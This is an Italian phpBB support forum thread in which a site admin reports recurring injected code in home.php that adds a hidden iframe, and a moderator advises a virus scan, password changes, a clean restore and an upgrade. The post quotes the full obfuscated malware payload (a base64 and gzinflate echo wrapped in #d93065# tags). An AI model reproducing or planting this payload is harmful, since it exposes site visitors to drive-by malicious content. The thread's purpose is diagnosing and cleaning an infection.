ciao a tutti
da qualche settimana ho un problema con il forum su sito http://www.bonsaitime.com che gestisco: periodicamente mi compare nel codice delle pagine principali (home.php) un codice malevolo che inserisce un iframe nascosto ad una pagina segnalata come non affidabile, ottenendo che qualche antivirus blocca la visualizzazione della pagina.
il codice inserito è una cosa del genere:
#d93065#
echo(gzinflate(base64_decode("3VPBcoIwEP0V60FBQElIQBvTHvyEHhkPKiCMVhCYdhzHf282Sxh12h8oE0Ky2d339m0YDP7Hs2x2dVG1b219uZ6nm6pKT8kqL46JdXaGQ1vcdpt2l1vnb/uaS88ndMZFJsdZXX6u8rGAsG2636ayqsu2bC9VakK2LNgnjX1tGhmvReZIKx+NMvt9vKlXZZKOX4dDkcr0a3MUJxmTKXd9l3GX+2rFmJp4AKsFTBy2vrK4ZO5yfUhdFmknPCVqgJ1ytLNQuzymIEQZu2B0BiNkgjwwiEuZwgDz/C47myMb3mXnTBOhaNWuSNk3vJEt9bUf0QgEoICC/8zL8AgiLM5UZuAVUBdKeyTaKbXQI0JIFt5XFfRkAnTGJL9Kw1hHnkITDKpJBdXcJQg6YBQaoXtU9tiwxwKUDgjXh6L2JhoEw0p7HRi2IXryoSH0GqX/s+HKSd8Kojd6BfdMXceytgoZetQj8AqPhL5TvEjqUVE4jn09yEKom9s0zkdbF6d9nK0tj0zyicUdMjnFh7Wtfo7Uahr1uS1n3W/0Aw==")));
#/d93065#
ogni volta che cancello questo codice, ricompare dopo qualche giorno.
poichè escludo l'accesso in ftp da utenti non riconosciuti, penso che il problema dipenda da una falla del forum che è un phpbb.
avete qualche consiglio?
grazie
ciao
phpBB Italia chiude!
phpBB Italia ringrazia tutti gli utenti che hanno dato fiducia al nostro progetto per ben 9 anni, e che, grazie al grande lavoro fatto da tutto lo Staff (rigorosamente a titolo gratuito), hanno portato il portale a diventare il principale punto di riferimento italiano alla piattaforma phpBB.
Purtroppo, causa motivi personali, non ho più modo di gestirlo e portarlo avanti. Il forum viene ora posto in uno stato di sola lettura, nonché un archivio storico per permettere a chiunque di fruire di tutte le discussioni trattate.
Il nuovo portale di assistenza per l'Italia di phpBB diventa phpBB-Store.it, cui ringrazio per aver deciso di portare avanti questo grande progetto.
Grazie ancora,
Carlo - Amministratore di phpBB Italia
phpBB Italia ringrazia tutti gli utenti che hanno dato fiducia al nostro progetto per ben 9 anni, e che, grazie al grande lavoro fatto da tutto lo Staff (rigorosamente a titolo gratuito), hanno portato il portale a diventare il principale punto di riferimento italiano alla piattaforma phpBB.
Purtroppo, causa motivi personali, non ho più modo di gestirlo e portarlo avanti. Il forum viene ora posto in uno stato di sola lettura, nonché un archivio storico per permettere a chiunque di fruire di tutte le discussioni trattate.
Il nuovo portale di assistenza per l'Italia di phpBB diventa phpBB-Store.it, cui ringrazio per aver deciso di portare avanti questo grande progetto.
Grazie ancora,
Carlo - Amministratore di phpBB Italia
malware #d93065#
-
Angolo
- Leader Traduttori
- Messaggi: 7237
- Iscritto il: 11/03/2011, 17:37
- Sesso: Maschio
- Versione: 3.0.12
- Server: UNIX/Linux
- PHP: 5.6.18
- Database: MySQL 5.6.33-log
- Contatta:
Re: malware #d93065#
Se in effetti la versione in uso è la 3.0.0, è sicuro che la causa sia il phpBB3. Ma non il phpBB3 in sé, ma il phpBB3 non aggiornato. Che è cosa diversa. Se invece la versione fosse la 3.0.10, sarebbe sicuro che il phpBB3 non avrebbe praticamente alcuna rilevanza nella faccenda.
Conferma per favore, la versione indicata nel profilo.
Chiarito questo, devi (tutto e nell'ordine):
1 - Effettuare una seria e approfondita scansione antivirus e antispyware sul tuo PC
2 - Cambiare tutte le password amministrative, utilizzando password molto complesse. Inclusa email.
3 - Sperando che il database sia integro, effettuare un corretto ripristino integrale ftp (corretto: relativo alla tua versione... prima cancelli completamente il vecchio contenuto e dopo carichi il nuovo; niente sovrascrittura).
4 - Se così risolvi, procedi immediatamente all'aggiornamento verso la 3.0.10, che deve essere completo (phpBB, stile, traduzione).
Il tuo profilo indica assenza di MOD, se confermi, la cosa è relativamente semplice, e non si pone questo problema. MOD o modifiche in genere, script, contatori non collaudati, ecc.
Conferma per favore, la versione indicata nel profilo.
Chiarito questo, devi (tutto e nell'ordine):
1 - Effettuare una seria e approfondita scansione antivirus e antispyware sul tuo PC
2 - Cambiare tutte le password amministrative, utilizzando password molto complesse. Inclusa email.
3 - Sperando che il database sia integro, effettuare un corretto ripristino integrale ftp (corretto: relativo alla tua versione... prima cancelli completamente il vecchio contenuto e dopo carichi il nuovo; niente sovrascrittura).
4 - Se così risolvi, procedi immediatamente all'aggiornamento verso la 3.0.10, che deve essere completo (phpBB, stile, traduzione).
Il tuo profilo indica assenza di MOD, se confermi, la cosa è relativamente semplice, e non si pone questo problema. MOD o modifiche in genere, script, contatori non collaudati, ecc.
Chi c’è in linea
Visitano il forum: Nessuno e 26 ospiti